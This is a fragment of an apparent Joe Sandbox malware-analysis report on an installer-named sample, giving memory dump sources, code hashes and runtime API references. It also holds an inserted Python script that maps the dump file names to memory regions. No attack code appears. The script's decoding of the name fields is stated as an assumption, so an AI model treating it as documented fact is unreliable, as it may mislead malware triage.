                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                        • Instruction ID: 4d59ebfe34ef5c516892458685d4ba143058173b0e8d95d740c0a96f08476668
                                        • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                        • Instruction Fuzzy Hash: 70519E72F00609ABDB08CF98DD916EDF7F2EB88308F248169D211E7B91D7749A41CB90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                        • Instruction ID: 62893c6b113a85985dc837a421b9eb8962cd7396e455d8205425f42b651558de
                                        • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                        • Instruction Fuzzy Hash: FC3114277A444147CB0CCE3BCD1279F91935BD426A75ECF396D05DEF65D52CD8224144
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                        • Instruction ID: 8181d3a4bf9fb9e9d7ce21ad3db717d88ef3ad68c5f2407f85fc387f4de0397b
                                        • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                        • Instruction Fuzzy Hash: 66219077320A0647E74C8A38D83737532D1A705318F98A66DEA6BCE2C2D73AC457C385
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                        • Instruction ID: 3f34755bfb8a4a87962900a0a6531bc20035cec9772fa717e4fb7b36b537330d
                                        • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                        • Instruction Fuzzy Hash: 90E08C72A16238EBCB10CBC8EA00E9AB3ECEB45A14B220097B511D3A20D270DF00C7D0
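Each Memory Dump Source above is named by a dotted tuple, and the seven dumps listed under the 6CB80000 entry together describe one loaded module. The following Python is an added example, not part of the Joe Sandbox report, that turns those seven names into a region map so an analyst can tell which dump a given code reference (such as 6CD08927 or 6CD486F1 in the API lists further down) was taken from. The field layout it assumes (process id, dump index, sequence number, base address, page protection, a state flag, region type, a trailing index) and the decoding of the fifth and seventh fields as PAGE_* and MEM_* constants are assumptions about the naming convention, not something this page documents; the PAGE_* and MEM_* values themselves are the winnt.h constants.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the seven dump names copied from the report's "Associated:" lines
# for the module based at 6CB80000 (process 6, dump 2).
ASSOCIATED_DUMPS = [
    "00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp",
    "00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp",
    "00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp",
    "00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp",
    "00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp",
    "00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp",
    "00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp",
]

# ASSUMED layout of a .sdmp name (not documented on the report page):
# <pid>.<dump index>.<sequence>.<base address>.<protection>.<state flag>.<region type>.<index>.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<index>[0-9A-Fa-f]{8})\.sdmp$"
)

# winnt.h page-protection and region-type constants (MEMORY_BASIC_INFORMATION.Protect / .Type).
# Mapping the name's fifth and seventh fields onto them is the assumption this example rests on.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass
class Region:
    pid: int
    dump_index: int
    seq: int
    base: int
    protect: int
    region_type: int
    dump: str
    end: Optional[int] = None  # next region's base; None for the last region (size unknown)

    @property
    def protect_name(self) -> str:
        # strip PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE modifier bits before the lookup
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.region_type, f"0x{self.region_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE, WRITECOPY and their EXECUTE variants


def parse_dump_name(name: str) -> Region:
    """Split one .sdmp name into its fields; 8-hex-digit fields are read as hex."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a .sdmp name: {name}")
    return Region(
        pid=int(m["pid"], 16), dump_index=int(m["dump"], 16), seq=int(m["seq"]),
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        region_type=int(m["type"], 16), dump=name,
    )


def module_map(names: List[str]) -> List[Region]:
    """Order the dumps by base address and derive each region's end from its successor."""
    regions = sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)
    for cur, nxt in zip(regions, regions[1:]):
        cur.end = nxt.base
    return regions


def dump_for_address(regions: List[Region], addr: int) -> Optional[Region]:
    """Return the region (and so the dump file) that a code reference falls into."""
    for r in regions:
        if r.base <= addr and (r.end is None or addr < r.end):
            return r
    return None


def main() -> None:
    regions = module_map(ASSOCIATED_DUMPS)
    for r in regions:
        size = f"0x{r.end - r.base:X}" if r.end is not None else "?"
        flags = ("X" if r.executable else "-") + ("W" if r.writable else "-")
        print(f"{r.base:08X}  {size:>9}  {flags}  {r.protect_name:<22} {r.type_name}")
    for addr in (0x6CD08927, 0x6CD486F1):  # two code references quoted in the API lists
        hit = dump_for_address(regions, addr)
        print(f"{addr:08X} -> {hit.base:08X} ({hit.protect_name})" if hit else f"{addr:08X} -> no dump")


if __name__ == "__main__":
    main()
```

Run stand-alone it prints one line per region, using the gap to the next region as the size (the last region's size cannot be recovered from the names). Under the assumed decoding, 6CB81000 and 6CE07000 are the two executable regions, and the 6CD36000 dump that most entries in this section cite as their source is PAGE_WRITECOPY, a copy-on-write data mapping rather than the module's text; functions disassembled from it (for example the one referencing 6CD486F1) are worth checking in the disassembly before being taken as ordinary compiled code.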
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                        • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                        • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                        • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                        • API String ID: 3519838083-609671
                                        • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction ID: 29bab82513a5fb66f5eefba8e296fe517c143d3724e6b6b9d5fb7ec41301f500
                                        • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction Fuzzy Hash: E5D19071A05209EFCF01DFA5D980AEEB7B5FF85308F204559E055A3E60DB70A949CBA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$H_prolog
                                        • String ID: >WJ$x$x
                                        • API String ID: 2300968129-3162267903
                                        • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction ID: 1293ba5e54284972405e93d2412934017aa23aed2637549ab69f570d65bc255e
                                        • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction Fuzzy Hash: 6C127A71D00249EFDF10CFA4C880AEEBBB5FF48318F648169E519A7660DB349965CF61
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 6CD08927
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6CD0892F
                                        • _ValidateLocalCookies.LIBCMT ref: 6CD089B8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6CD089E3
                                        • _ValidateLocalCookies.LIBCMT ref: 6CD08A38
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: ef4ab316e3054ef3fd3ef0e39d2f5e87454241d9948ba19ce8fa64928080a8ba
                                        • Instruction ID: 85c432a9992262b02639e13411afe1def6621d229f8f9c806e2e2c8ac73b4598
                                        • Opcode Fuzzy Hash: ef4ab316e3054ef3fd3ef0e39d2f5e87454241d9948ba19ce8fa64928080a8ba
                                        • Instruction Fuzzy Hash: E641C030B00618EBCF01DFACDC80A9EBBB5AF45318F14815AE9185BB61D732DA15CBE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: api-ms-$ext-ms-
                                        • API String ID: 0-537541572
                                        • Opcode ID: ac4c9336dc25ebbe0ae3b987a26a906652040432513b1d5b2c368c7138c04a10
                                        • Instruction ID: ef91a93c78aa5f17da8fe1a68a0d397adc0c5d3a8a82884a0d8c0e106ba1e570
                                        • Opcode Fuzzy Hash: ac4c9336dc25ebbe0ae3b987a26a906652040432513b1d5b2c368c7138c04a10
                                        • Instruction Fuzzy Hash: F921D831E1D221EBDB214B69EC48B4A3778AF437A8F190611E955ABEA1F734DD01C7E0
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,6CD19EF0,?), ref: 6CD1AD19
                                        • __fassign.LIBCMT ref: 6CD1AEF8
                                        • __fassign.LIBCMT ref: 6CD1AF15
                                        • WriteFile.KERNEL32(?,6CD248D6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD1AF5D
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CD1AF9D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD1B049
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                        • String ID:
                                        • API String ID: 4031098158-0
                                        • Opcode ID: e229fabc726bcf00f72682428c217618e46e3d986f7c248eb58114752686c5c1
                                        • Instruction ID: c1141da113ba223e3bfac64bfdc0d2045f1edfb77da5e65c47299e77fbace56b
                                        • Opcode Fuzzy Hash: e229fabc726bcf00f72682428c217618e46e3d986f7c248eb58114752686c5c1
                                        • Instruction Fuzzy Hash: 30D1CFB1E042589FCF15CFA8D8809EDBBB5FF09314F240169E869BBB51D731994ACB60
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2F95
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2FAF
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD2FD0
                                        • __Getctype.LIBCPMT ref: 6CBD3084
                                        • std::_Facet_Register.LIBCPMT ref: 6CBD309C
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD30B7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                        • String ID:
                                        • API String ID: 1102183713-0
                                        • Opcode ID: 2f2846ccbcc729fa5c75e20a6da6a6da8b1c450ad1224f294eeb30119c521d6d
                                        • Instruction ID: 543182d5dfc9c258cf647ebcb8218592975db32873cf69416b2cd490a4cae8dd
                                        • Opcode Fuzzy Hash: 2f2846ccbcc729fa5c75e20a6da6a6da8b1c450ad1224f294eeb30119c521d6d
                                        • Instruction Fuzzy Hash: 0C4158B1E002548FCB14CF98C858B9EBBF4FF54728F094129D859AB751E735A944CBE2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$__aullrem
                                        • String ID:
                                        • API String ID: 2022606265-0
                                        • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction ID: 1130b498a4351d0e049cf0443de04020d69f2e6c1c101a15232a86bad0cc05a1
                                        • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction Fuzzy Hash: D42164B1901619FBDF108F988C40DDF7E69EB417AAF60C326B624625B0E2715D60D7B1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD486F1
                                          • Part of subcall function 6CD57173: __EH_prolog.LIBCMT ref: 6CD57178
                                        • __EH_prolog.LIBCMT ref: 6CD488F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: IJ$WIJ$J
                                        • API String ID: 3519838083-740443243
                                        • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction ID: a755a7452d7b0df7281084231cfc69e3f451518ac9a3f0962bcc3c5696030154
                                        • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction Fuzzy Hash: DB71AF70900654DFDB14DFA4C854BDEB7F0BF15348F1080AAD959ABBA1CB74BA08CBA5
                                        APIs
                                        • _free.LIBCMT ref: 6CD248FD
                                        • _free.LIBCMT ref: 6CD24926
                                        • SetEndOfFile.KERNEL32(00000000,6CD2350C,00000000,6CD19EF0,?,?,?,?,?,?,?,6CD2350C,6CD19EF0,00000000), ref: 6CD24958
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CD2350C,6CD19EF0,00000000,?,?,?,?,00000000,?), ref: 6CD24974
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFileLast
                                        • String ID: 8Q
                                        • API String ID: 1547350101-4022487301
                                        • Opcode ID: d29d2676992ad746a75e59b7685971687e87a0a6cbbd71b7caa934e660aaf0ca
                                        • Instruction ID: 851f68a390e689bb03c44435444d1c4ee46221e3422a8269011f2b191b70e7c3
                                        • Opcode Fuzzy Hash: d29d2676992ad746a75e59b7685971687e87a0a6cbbd71b7caa934e660aaf0ca
                                        • Instruction Fuzzy Hash: 7541E676A006449ADB019FA8CC40BCEB7B9EF8932CF240114FE24A7BB0DB38C4098774
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD5C41D
                                          • Part of subcall function 6CD5CE40: __EH_prolog.LIBCMT ref: 6CD5CE45
                                          • Part of subcall function 6CD5C8EB: __EH_prolog.LIBCMT ref: 6CD5C8F0
                                          • Part of subcall function 6CD5C593: __EH_prolog.LIBCMT ref: 6CD5C598
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: &qB$0aJ$A0$XqB
                                        • API String ID: 3519838083-1326096578
                                        • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction ID: 1fe4898600df388fb069ff87e788097565b561dcd444ee7afab2afcbd31dd73c
                                        • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction Fuzzy Hash: 22217971E01258EACF05DBE4D9809EDBBB5AF66308F60406EE416677A1DB741E0CCB25
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: J$0J$DJ$`J
                                        • API String ID: 3519838083-2453737217
                                        • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                        • Instruction ID: c1d7e722275b82435751078eee0eeac5a7a781eac532e9033d69a09e59c6ae2c
                                        • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                        • Instruction Fuzzy Hash: 4411E6B0500B64CEC7208F5AC45019AFBE4FFA5708B00C90FC0A687B60C7F8A508CB65
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CD0DFD4,00000000,?,6CD0E055,6CD08A69,00000003,00000000), ref: 6CD0DF5F
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD0DF72
                                        • FreeLibrary.KERNEL32(00000000,?,?,6CD0DFD4,00000000,?,6CD0E055,6CD08A69,00000003,00000000), ref: 6CD0DF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: a0bfd292d617c884da88760962c10146ac3b14a6d0d573fe1eef23ea866c98e1
                                        • Instruction ID: 81fc3f807b15298337d129d26c42f89adb405c8b15a219a3a7ee0e2182525daa
                                        • Opcode Fuzzy Hash: a0bfd292d617c884da88760962c10146ac3b14a6d0d573fe1eef23ea866c98e1
                                        • Instruction Fuzzy Hash: 65F08230A01219FBEF129F54D809B9D7FB9EB46359F204065F504E2460CB308E04DAD1
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6CD0614E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CD06159
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CD061C7
                                          • Part of subcall function 6CD06050: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CD06068
                                        • std::locale::_Setgloballocale.LIBCPMT ref: 6CD06174
                                        • _Yarn.LIBCPMT ref: 6CD0618A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
